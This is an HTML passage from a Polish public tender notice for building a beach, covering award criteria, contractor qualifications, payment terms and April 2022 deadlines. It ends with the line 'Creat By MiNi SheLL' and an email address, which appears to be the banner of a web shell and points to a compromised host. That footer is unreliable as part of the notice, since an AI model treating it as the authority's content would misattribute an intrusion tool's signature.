Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu <br/>na zasadach określonych w Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4)	zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeżeli wykaże, że: <br/>4.1.) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej 2 zadania odpowiadające swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia. <br/>Przez „zadanie odpowiadające swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia“ należy rozumieć wykonanie budowy plaży o wartości minimum 500.000,00 zł brutto.<br/>4.2.) będzie dysponował w okresie realizacji zamówienia osobami o odpowiednich kwalifikacjach zawodowych niezbędnych do wykonania zamówienia:<br/>a) Kierownik robót w specjalności ogólnobudowlanej jednocześnie rolę kierownika budowy o minimalnych wymaganiach:<br/>- wykształcenie wyższe lub średnie,<br/>- posiadający uprawnienia do wykonywania samodzielnych funkcji technicznych <br/>w budownictwie w specjalności ogólnobudowlanej lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania, których w aktualnym stanie prawnym uprawniają uprawnienia budowlane w/w specjalności,<br/>3.	Zamawiający, w stosunku do Wykonawców wspólnie ubiegających si e o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej – dopuszcza łącznie spełnianie warunków przez Wykonawcę.<br/>4.	Zamawiający może na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, <br/>w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">2)	Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty; <br/>- załącznik nr 5 do SWZ;<br/>3)	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, <br/>w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - załącznik nr 5A do SWZ;<br/>3) oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadajaąwymagane uprawnienia</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności <br/>do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2019 r. poz. 369), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 3 do SWZ;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie przewiduje uzupełnienia przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie <br/>o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia <br/>z postępowania (art. 125 ust. 1 pzp) – zgodnie z załącznikiem nr 2 do SWZ.<br/>2.	Informacje zawarte w oświadczeniu, o którym mowa w pkt 1 stanowią wstępne potwierdzenie,<br/>że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>3. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania <br/>mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. Wzór oświadczenia stanowi załącznik nr 6 do SWZ. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w Rozdziale X ust. 1 SWZ, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby, zgodnie z katalogiem dokumentów określonych w Rozdziale X SWZ.<br/>1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, <br/>o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia <br/>te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane/dostawy/usługi wykonają poszczególni wykonawcy.<br/>4.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, <br/>o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia <br/>te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane/dostawy/usługi wykonają poszczególni wykonawcy.<br/>4.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> 1.	Zamawiający wypłaci Wykonawcy w terminie 7 dni za wykonany pierwszy etap robót wynagrodzenie w wysokości nie niższej niż 10% wartości wynagrodzenia wynikającego z przedmiotowej umowy.<br/>2.	Zamawiający wypłaci Wykonawcy w terminie 7 dni za wykonany drugi etap robót wynagrodzenie w wysokości nie wyższej niż 50% otrzymanego dofinansowania wynikającego z otrzymanej promesy.<br/>3.	Zapłata pozostałej wynikającej z umowy kwoty wynagrodzenia za wykonanie przedmiotu zamówienia nastąpi po jego prawidłowym wykonaniu i końcowym odbiorze technicznym robót. Płatność nastąpi na podstawie faktury przedstawionej przez Wykonawcę w terminie nie dłuższym niż 35 dni od dnia odbioru inwestycji przez Zamawiającego. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego <br/>na warunkach określonych we Wzorze Umowy dla poszczególnych części - Załączniki nr 4 do SWZ.<br/>2.	Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>3.	Zamawiający nie przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/torzym</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-08 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-05-08</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com